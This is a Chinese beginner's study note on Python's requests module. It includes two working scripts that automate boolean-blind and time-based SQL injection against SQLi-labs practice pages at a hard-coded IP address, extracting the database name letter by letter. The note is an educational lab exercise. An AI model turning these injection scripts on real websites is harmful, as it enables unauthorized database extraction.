python解决盲注和延迟注入笔记
requests模块
要用python解决这一问题需要了解request这个模块,我下载的是pycharm所以自带这个模块不用安装,需要安装的话
pip install requests
pip命令执行就能安装成功,然后是关于requests模块的一些函数:
get请求 | post请求 |
---|---|
res=request.get(url,params=data) | res=request.post(url,data) |
这里res是响应response 的缩写;
括号里也有很多参数:
1. url
2. header
3. params(get请求)
4. data(post请求)
5. files
6. cookies
等等;
- res.text 响应页面内容
- res.status_code 响应码(200)
- res.encoding(页面编码)
- res.content 二进制形式响应正文
- res,headers响应头部
- res.cookies 访问cookies
总之requests是一个功能强大的模块,可以定制头部信息、get传参、post传参、上传文件、重定向、会话跟踪、cookie信息等等;
为了熟悉这个模块来使用这个模块解决SQL labs中盲注和延时注入的问题,这里只做到暴库这一步,直接上代码截图:
解决延时注入
import requests
import string
url = "http://43.247.91.228:84/Less-9/"
def iftimeout(url):
try:
res = requests.get(url,timeout=3)
return res.text
except Exception as e:
return "timeout"
dbnamelen = 0
while True:
dbnamelen+=1
dbnamelen_url = url+"?id=1'+and+if(length(database())="+str(dbnamelen)+",sleep(5),1)--+"
print(dbnamelen_url)
if "timeout" in iftimeout(dbnamelen_url):
print("库长:",dbnamelen)
break
#暴库长 库长为8
dbname=""
for i in range(1,9):
for j in string.ascii_lowercase:
dbname_url=url+"?id=1'+and+if(substr(database(),"+str(i)+",1)='"+j+"',sleep(5),1)--+"
print(dbname_url)
if "timeout" in iftimeout(dbname_url):
dbname+=j
print("库名:",dbname)
break
#暴库名
爆出来的库名
解决盲注
import requests
import string
url = "http://43.247.91.228:84/Less-8/"
htmlLen = len(requests.get(url=url+"?id=1").text)
print("the len of HTML:"+str(htmlLen))
#暴库长
dbNameLen = 0
while True:
dbNameLen_url = url+"?id=1'+and+length(database())="+str(dbNameLen)+"--+"
print(dbNameLen_url)
if len(requests.get(dbNameLen_url).text) == htmlLen:
print("the length of dbName:"+str(dbNameLen))
break
if dbNameLen == 30:
print("Error!")
dbNameLen+=1
#暴库名
dbName = ""
for i in range(1,9):
for j in string.ascii_lowercase:
dbName_url=url+"?id=1'+and+substr(database(),"+str(i)+",1)='"+j+"' --+"
if len(requests.get(dbName_url).text) == htmlLen:
dbName += j
print(dbName)
break
跑出来的库名和上图一样
总结
python是个好东西得好好学!!!
这也是我看学习视频的总结笔记,很基础,勿喷